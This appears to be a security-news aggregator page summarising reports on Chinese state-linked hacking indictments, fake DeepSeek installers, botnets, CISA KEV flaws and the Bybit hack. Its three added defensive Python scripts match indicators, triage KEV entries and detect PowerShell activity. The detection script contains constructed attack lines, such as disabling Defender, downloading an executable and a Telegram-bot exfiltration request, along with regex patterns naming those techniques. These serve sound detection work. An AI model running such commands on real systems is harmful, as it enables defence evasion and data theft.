techminis

A naukri.com initiative

Hacking News

Source: Securityaffairs

The U.S. DoJ charges 12 Chinese nationals for state-linked cyber operations

  • The U.S. DoJ has charged 12 Chinese nationals, including two PRC Ministry of Public Security (MPS) officers and members of the APT27 group, over state-linked cyber operations.
  • The hackers, either employed by the contractor i-Soon or working freelance, targeted U.S.-based critics of the PRC and Asian governments at the direction of PRC agencies.
  • The indictments cover the intrusions themselves, the sale of stolen data, and the use of contractors to obscure the PRC government's role in the theft.
  • FBI Public Service Announcements describe China's hacker-for-hire ecosystem and the global reach of its intrusions.
  • The unsealed indictments name i-Soon employees and MPS officers and condemn intrusions against a wide range of victims.
  • The FBI and State Department are offering rewards for information on the indicted individuals and on state-sponsored cyberattacks.
  • i-Soon worked with PRC government agencies on hacking operations and also sold stolen data to a range of buyers.
  • i-Soon developed specialized software aimed at accounts on platforms such as Twitter, Gmail, and Microsoft Outlook.
  • According to the indictment, this tooling gave operators unauthorized access to victim accounts, including bypassing protections such as multi-factor authentication.
  • The charges include computer intrusion and wire fraud offences, the maximum penalties for which are prescribed by Congress.

Source: Securelist

Trojans disguised as AI: Cybercriminals exploit DeepSeek’s popularity

  • The release of the DeepSeek-R1 reasoning model in early 2025 drew cybercriminals' attention because the model is popular and available both for local use and as a free hosted service.
  • Cybercriminals set up fake websites mimicking the official DeepSeek chatbot site to distribute malicious code disguised as a desktop client for the service.
  • The fake sites prompted visitors to download applications carrying malicious payloads, including a Python stealer script that harvests sensitive data from the victim's computer.
  • The stealer collects browser cookies, saved login credentials, cryptocurrency wallet data and more, which can lead to account takeover and financial loss.
  • Other fake DeepSeek sites distributed Trojans via malicious installers that give the attacker remote access to the victim's computer.
  • Some campaigns targeted Chinese-speaking users with malicious executables tied to specific domains.
  • Users should be wary of links from unverified sources, especially for popular services like DeepSeek, which has no native Windows client, so any "DeepSeek for Windows" installer is suspect by definition.
  • The campaigns lure victims through several channels: links shared in messengers and on social networks, typosquatted domains, and affiliate programs.
  • Basic digital hygiene together with a robust security solution significantly reduces the risk of infection and data loss.
  • Indicators of compromise, including malicious domains and MD5 hashes, are provided to help identify related activity.
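The last three points (typosquatted domains, published IOC domains and MD5 hashes) are the kind of data a defender turns into a sweep. The script below is an added example, not code from the Securelist report or from DeepSeek: it matches a constructed IOC list against constructed resolver log lines and a constructed download folder, and separately flags look-alike domains by edit distance from the brand label. Every domain, hash, client name and log line here is a placeholder; the real indicators are in the report itself, and the allow-list of official domains is an assumption.

```python
"""Added example: match published-style IOCs (domains, MD5 hashes) against
constructed telemetry and flag look-alike DeepSeek domains.
Every domain, hash and log line here is constructed for illustration; none
are the indicators from the Securelist report."""
import hashlib
import re

# Genuine service domains (assumption: this short allow-list is complete).
OFFICIAL_DOMAINS = {"deepseek.com", "chat.deepseek.com", "platform.deepseek.com"}
BRAND_LABEL = "deepseek"

# Constructed IOC set in the shape a vendor publishes: malicious domains and
# MD5 hashes of the droppers. Placeholders only.
IOC_DOMAINS = {"deepseek-ai-download.example", "deepseek-pc.example"}
IOC_MD5 = {hashlib.md5(b"constructed-malicious-installer").hexdigest()}

# Constructed resolver log: "<timestamp> <client> query <qname> <qtype>".
DNS_LOG = """\
2025-02-10T10:01:02Z host01 query chat.deepseek.com A
2025-02-10T10:02:11Z host02 query deepseek-ai-download.example A
2025-02-10T10:03:45Z host03 query deepseak.example A
2025-02-10T10:04:00Z host04 query github.com A
"""
DNS_RE = re.compile(r"^(\S+)\s+(\S+)\s+query\s+(\S+)\s+(\S+)$")


def levenshtein(a: str, b: str) -> int:
    """Edit distance; a one-letter swap like deepseak/deepseek scores 1."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def is_lookalike(host: str) -> bool:
    """True for hosts that imitate the brand but are not official domains.

    Every label except the TLD is checked, so "chat.deepseek.com.evil.example"
    is caught as well as "deepseak.example". Distance <= 2 is a tuning choice;
    lower it if the brand label is a short common word.
    """
    host = host.lower().rstrip(".")
    if host in OFFICIAL_DOMAINS or host.endswith("." + BRAND_LABEL + ".com"):
        return False
    for label in host.split(".")[:-1]:
        if label == BRAND_LABEL or BRAND_LABEL in label or levenshtein(label, BRAND_LABEL) <= 2:
            return True
    return False


def scan_dns(log: str) -> list[tuple[str, str, str]]:
    """Return (client, qname, reason) for queries matching an IOC or a look-alike."""
    hits = []
    for line in log.splitlines():
        m = DNS_RE.match(line.strip())
        if not m:
            continue
        client, qname = m.group(2), m.group(3).lower().rstrip(".")
        if qname in IOC_DOMAINS:
            hits.append((client, qname, "ioc-domain"))
        elif is_lookalike(qname):
            hits.append((client, qname, "lookalike"))
    return hits


def scan_files(files: list[tuple[str, bytes]]) -> list[tuple[str, str]]:
    """Return (path, md5) for contents whose MD5 is in the IOC list.

    MD5 is used only because that is what the report publishes: this is an
    identity lookup, not an integrity check. Match SHA-256 too when given.
    """
    flagged = []
    for path, content in files:
        digest = hashlib.md5(content).hexdigest()
        if digest in IOC_MD5:
            flagged.append((path, digest))
    return flagged


# Constructed download folder contents: (path, bytes).
SAMPLE_FILES = [
    ("C:/Users/a/Downloads/deepseek_setup.exe", b"constructed-malicious-installer"),
    ("C:/Users/a/Downloads/notes.txt", b"meeting notes"),
]

if __name__ == "__main__":
    for hit in scan_dns(DNS_LOG):
        print("dns ", *hit)
    for hit in scan_files(SAMPLE_FILES):
        print("file", *hit)
```

Running it prints the IOC hit for host02 and the look-alike hit for host03 while leaving the legitimate chat.deepseek.com and github.com queries alone; swap in the report's real domains and hashes and point the functions at your own resolver logs and endpoint file inventory to use it for a sweep.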

Source: Securityaffairs

Chinese Lotus Blossom APT targets multiple sectors with Sagerunex backdoor

  • The China-linked Lotus Blossom APT is targeting governments and industries in Asian countries with new variants of its Sagerunex backdoor.
  • Lotus Blossom has used Sagerunex since at least 2016.
  • Two new Sagerunex variants use legitimate third-party services (Dropbox, Twitter and Zimbra webmail) as command-and-control channels, so the C2 traffic blends in with ordinary HTTPS to well-known services.
  • The group pairs the backdoor with a range of supporting tools and tactics to evade detection and achieve its objectives.

Source: Siliconangle

Justice Department indicts Chinese officials and contractors over cyber intrusion campaign

  • The U.S. Department of Justice has indicted 12 Chinese nationals, including government officials and contractors, over a cyber intrusion campaign.
  • The indictment alleges that the contractor Anxun Information Technology Co. Ltd. (i-Soon) carried out intrusions on behalf of PRC government ministries while also selling stolen information for profit.
  • Targets included U.S. government agencies, religious organizations, human rights groups, journalists, and the foreign ministries of several Asian nations.
  • The Justice Department seized internet domains and server accounts used by the defendants, disrupting their operational infrastructure.

Source: Securityaffairs

China-linked APT Silk Typhoon targets IT Supply Chain

  • China-linked APT group Silk Typhoon is now targeting the global IT supply chain, compromising IT service providers and using their access to reach and move laterally into the providers' customers.
  • The group has shifted tactics, going after IT solutions such as remote management tools and cloud applications to gain initial access.
  • It exploits unpatched applications and uses stolen credentials to escalate privileges and conduct espionage.
  • Silk Typhoon targets many sectors worldwide; Microsoft is working to disrupt its operations and to strengthen customers' defenses.

Source: TechCrunch

Justice Department charges Chinese hackers-for-hire linked to Treasury breach

  • The U.S. Department of Justice has charged 12 Chinese hackers linked to intrusions at more than 100 American organizations, including the U.S. Treasury.
  • The defendants were key players in China's hacker-for-hire ecosystem, targeting organizations in order to suppress free speech and religious freedom.
  • Two of the indicted hackers are tied to the China government-backed group APT27 and took part in multi-year, for-profit computer intrusion campaigns.
  • The FBI has seized the infrastructure one of the hackers used in the U.S. Treasury breach, and charges have been announced against employees of the Chinese government hacking contractor i-Soon.

Source: Securityaffairs

Hunters International gang claims the theft of 1.4 TB of data allegedly stolen from Tata Technologies

  • The Hunters International ransomware group claims to have breached Tata Technologies and stolen 1.4 TB of data, which it is threatening to leak.
  • According to a regulatory filing with the National Stock Exchange of India, the ransomware attack took place in January.
  • The company temporarily disconnected some of its IT services to contain the threat; it says all systems have since been restored.

Source: Securityaffairs

New Eleven11bot botnet infected 86K+ IoT devices

  • The Eleven11bot botnet has infected more than 86,000 IoT devices, mainly security cameras and network video recorders (NVRs).
  • It has launched attacks against several sectors, including communications service providers and gaming hosting infrastructure, using a variety of attack vectors.
  • GreyNoise researchers flagged 305 IP addresses as malicious, 61% of them geolocated to Iran.
  • The Shadowserver Foundation counted roughly 86,400 infected devices, with the largest numbers in the United States and the United Kingdom.

Source: Securityaffairs

Polish Space Agency POLSA disconnected its network following a cyberattack

  • The Polish space agency POLSA has disconnected its network from the internet following a cyberattack.
  • The agency took its infrastructure offline to contain the attack and secure its data, a response consistent with a ransomware incident.
  • The incident may have been carried out by a nation-state actor, with Russia named as a possible source.
  • POLSA has not released technical details of the attack.

Source: Securityaffairs

U.S. CISA adds Linux kernel and VMware ESXi and Workstation flaws to its Known Exploited Vulnerabilities catalog

  • The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a Linux kernel flaw and three VMware ESXi and Workstation flaws to its Known Exploited Vulnerabilities (KEV) catalog.
  • The Linux kernel vulnerability (CVE-2024-50302) was patched upstream in the kernel and shipped to Android devices in Google's March 2025 security update; the three VMware vulnerabilities (CVE-2025-22224, CVE-2025-22225, CVE-2025-22226) were disclosed as already under active exploitation.
  • CVE-2024-50302 was likely used as part of an exploit chain in Cellebrite's mobile forensic tools to unlock an Android phone.
  • Under Binding Operational Directive (BOD) 22-01, federal civilian agencies must remediate the flaws by March 25, 2025.
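A KEV addition only matters if it reaches the systems that run the affected software, so the practical step is to join the catalog against your own inventory and compute how far each host is from its BOD 22-01 due date. The script below is an added example, not CISA tooling: the JSON is a constructed excerpt that mirrors the real feed's field names, with only the four CVE IDs and the March 25, 2025 due date taken from the article (the dateAdded and product strings are assumed), the inventory is invented, and the live-feed URL is CISA's published location but is not fetched so the example runs offline.

```python
"""Added example: cross-reference a host inventory with a CISA KEV feed and
report BOD 22-01 due dates. KEV_EXCERPT is a constructed excerpt shaped like
the real feed; only the CVE IDs and the 2025-03-25 due date come from the
article, and INVENTORY is invented."""
import json
import urllib.request
from datetime import date

# Published location of the catalog (not fetched here, so the demo is offline).
KEV_URL = "https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json"

KEV_EXCERPT = json.dumps({
    "title": "constructed excerpt, not the real catalog",
    "vulnerabilities": [
        {"cveID": "CVE-2024-50302", "vendorProject": "Linux", "product": "Kernel",
         "dateAdded": "2025-03-04", "dueDate": "2025-03-25", "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2025-22224", "vendorProject": "VMware", "product": "ESXi and Workstation",
         "dateAdded": "2025-03-04", "dueDate": "2025-03-25", "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2025-22225", "vendorProject": "VMware", "product": "ESXi",
         "dateAdded": "2025-03-04", "dueDate": "2025-03-25", "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2025-22226", "vendorProject": "VMware", "product": "ESXi, Workstation, and Fusion",
         "dateAdded": "2025-03-04", "dueDate": "2025-03-25", "knownRansomwareCampaignUse": "Unknown"},
    ],
})

# Constructed inventory: CVEs a vulnerability scanner still reports open per host.
INVENTORY = [
    {"host": "esx01.lab", "product": "VMware ESXi 8.0",
     "open_cves": ["CVE-2025-22224", "CVE-2025-22225", "CVE-2025-22226"]},
    {"host": "android-testbench", "product": "Android 14 test device",
     "open_cves": ["CVE-2024-50302"]},
    {"host": "web01.lab", "product": "nginx", "open_cves": []},
]


def load_kev(raw: str) -> dict[str, dict]:
    """Index KEV entries by CVE ID."""
    return {v["cveID"]: v for v in json.loads(raw)["vulnerabilities"]}


def fetch_kev(url: str = KEV_URL, timeout: int = 30) -> dict[str, dict]:
    """Download the live feed (network call; not used by the offline demo)."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return load_kev(resp.read().decode("utf-8"))


def triage(inventory: list[dict], kev: dict[str, dict], today: str) -> list[dict]:
    """One finding per (host, KEV CVE), most overdue first. `today` is ISO yyyy-mm-dd.

    CVEs absent from the catalog are ignored on purpose: this is the BOD 22-01
    view and complements, rather than replaces, CVSS-based prioritisation.
    """
    now = date.fromisoformat(today)
    findings = []
    for host in inventory:
        for cve in host["open_cves"]:
            entry = kev.get(cve)
            if entry is None:
                continue
            due = date.fromisoformat(entry["dueDate"])
            findings.append({
                "host": host["host"],
                "cve": cve,
                "product": entry["vendorProject"] + " " + entry["product"],
                "due": entry["dueDate"],
                "days_overdue": (now - due).days,  # negative means time remaining
                "ransomware": entry.get("knownRansomwareCampaignUse") == "Known",
            })
    findings.sort(key=lambda f: (-f["days_overdue"], f["cve"], f["host"]))
    return findings


def overdue(findings: list[dict]) -> list[dict]:
    """Findings whose BOD 22-01 due date has already passed."""
    return [f for f in findings if f["days_overdue"] > 0]


if __name__ == "__main__":
    kev = load_kev(KEV_EXCERPT)
    for f in triage(INVENTORY, kev, today="2025-03-28"):
        state = f"{f['days_overdue']}d overdue" if f["days_overdue"] > 0 else f"{-f['days_overdue']}d left"
        print(f"{f['host']:18} {f['cve']:16} {f['product']:32} due {f['due']} ({state})")
```

Replace `load_kev(KEV_EXCERPT)` with `fetch_kev()` to run against the live catalog, and feed `INVENTORY` from your scanner export; hosts with no KEV-listed CVE (web01 above) simply produce no finding.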

Source: Securityaffairs

Digital nomads and the risk of infiltrated employees

  • Companies face a growing insider-threat risk, made worse by remote work.
  • North Korean operatives are infiltrating firms as fake remote IT hires and stealing data.
  • Thorough screening and stronger vetting processes are essential to mitigate insider threats.
  • Strengthening hiring practices and educating HR staff about infiltration risks are crucial.

Source: TechCrunch

Polish space agency says it’s investigating a cyberattack

  • Poland's space agency (POLSA) is investigating a cyberattack on its IT infrastructure.
  • POLSA disconnected its network from the internet after detecting the attack and its website remains offline.
  • The nature of the cyberattack is still unknown and state cybersecurity services are working to identify the perpetrators.
  • Poland has previously reported being the most attacked country in the European Union, with Russia being attributed as the source of many incidents.

Source: Securityaffairs

Google fixed two actively exploited Android flaws

  • Google has released the Android March 2025 security update, addressing more than 40 vulnerabilities.
  • Two of them, CVE-2024-43093 and CVE-2024-50302, are under active exploitation in the wild.
  • CVE-2024-43093 is a privilege escalation flaw in the Android Framework; exploitation requires user interaction.
  • The update also fixes ten critical vulnerabilities in the System component that could allow remote code execution.

Source: Securityaffairs

Mass exploitation campaign hit 4,000+ ISP networks to deploy info stealers and crypto miners

  • A mass exploitation campaign originating from Eastern Europe has hit more than 4,000 ISP networks, concentrated in China and on the U.S. West Coast.
  • The attackers gain access by brute-forcing weak credentials, then deploy info stealers and cryptocurrency miners.
  • The malware disables remote access to the host and uses PowerShell to drop additional binaries and turn off security features.
  • Harvested data is exfiltrated to the attackers' command-and-control channel via a Telegram bot.
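The three PowerShell behaviours named above (fetching a binary, disabling security features, beaconing to a Telegram bot) are individually noisy but distinctive in combination, which is how a detection should treat them. The script below is an added example, not code from the Splunk research or from the malware: it runs simple rules over constructed script-block log lines and alerts only on hosts that show defence evasion together with a download or a Telegram beacon. The host names, IP address, bot token and log lines are invented, and the specific cmdlets (Set-MpPreference, Invoke-WebRequest, the api.telegram.org bot URL) are assumptions about what this activity commonly looks like rather than details reported about this campaign.

```python
"""Added example: flag the PowerShell chain (download binary, disable security
features, report to a Telegram bot) in constructed script-block log lines.
Hosts, IP, token and log lines are invented; the cmdlets are assumptions
about typical tradecraft, not details from the Splunk report."""
import re
from collections import defaultdict

# "<timestamp> <host> powershell <script text>": a flattened stand-in for
# Windows event 4104 (script block logging) records. Constructed data.
LOG = """\
2025-03-01T02:14:07Z ws-edge-03 powershell Set-MpPreference -DisableRealtimeMonitoring $true
2025-03-01T02:14:09Z ws-edge-03 powershell Invoke-WebRequest http://203.0.113.10/x.exe -OutFile C:/ProgramData/x.exe
2025-03-01T02:15:30Z ws-edge-03 powershell Invoke-RestMethod -Uri https://api.telegram.org/bot123456:constructedTOKEN_value/sendDocument -Method Post
2025-03-01T03:00:00Z ws-admin-01 powershell Get-MpPreference
2025-03-01T03:05:00Z ws-admin-01 powershell Invoke-WebRequest https://example.com/tools/azcli.msi -OutFile ./azcli.msi
"""

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+powershell\s+(.*)$")
TOKEN_RE = re.compile(r"bot\d+:[\w-]+")

# One rule per behaviour in the write-up. Patterns are deliberately broad;
# the combination logic in flag_hosts() is what keeps the alert rate sane.
RULES = {
    "fetch_binary": re.compile(
        r"\b(Invoke-WebRequest|iwr|curl|wget|Start-BitsTransfer|DownloadFile|DownloadString)\b", re.I),
    "disable_defender": re.compile(
        r"\b(Set-MpPreference\s+-Disable\w+|Add-MpPreference\s+-Exclusion\w*)", re.I),
    "telegram_bot": re.compile(
        r"api\.telegram\.org/bot\d+:[\w-]+/(sendMessage|sendDocument)", re.I),
}


def redact_token(text: str) -> str:
    """Mask bot tokens so the alert itself does not leak a usable credential."""
    return TOKEN_RE.sub("bot<redacted>", text)


def match_rules(log: str) -> dict[str, dict[str, list[str]]]:
    """host -> rule name -> redacted script lines that triggered the rule."""
    hits: dict[str, dict[str, list[str]]] = defaultdict(lambda: defaultdict(list))
    for line in log.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        host, script = m.group(2), m.group(3)
        for name, pattern in RULES.items():
            if pattern.search(script):
                hits[host][name].append(redact_token(script))
    return {h: dict(r) for h, r in hits.items()}


def flag_hosts(log: str) -> list[str]:
    """Hosts showing defence evasion plus either a download or a Telegram beacon.

    A lone Invoke-WebRequest (a routine software install, as on ws-admin-01)
    does not page anyone; the chain does.
    """
    flagged = []
    for host, rules in match_rules(log).items():
        if "disable_defender" in rules and any(r in rules for r in ("fetch_binary", "telegram_bot")):
            flagged.append(host)
    return sorted(flagged)


if __name__ == "__main__":
    hits = match_rules(LOG)
    for host in flag_hosts(LOG):
        print(host)
        for rule, lines in hits[host].items():
            for l in lines:
                print(f"  [{rule}] {l}")
```

The same rule table can be pointed at real 4104 ScriptBlockText or Sysmon event 1 command lines once the `LINE_RE` parser is adjusted to that export format; keep the token redaction in place, since an exfiltrated Telegram bot token is itself a secret worth protecting in your SIEM.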

Source: TheNewsCrypto

Bybit CEO Says 77% of Stolen Funds From Bybit Hack Still Traceable

  • Bybit CEO Ben Zhou says 77% of the funds stolen in the Bybit hack remain traceable, while 20% have gone dark and 3% have been frozen.
  • On-chain tracker Ember reported that all of the stolen funds, about 499,000 ETH, have been laundered.
  • Zhou published a breakdown of the funds and their conversion into other cryptocurrencies; 83% of the stolen funds were converted into Bitcoin.
  • Bybit launched the Lazarusbounty.com website to share details of the stolen funds; 11 bounty hunters have assisted in freezing funds.
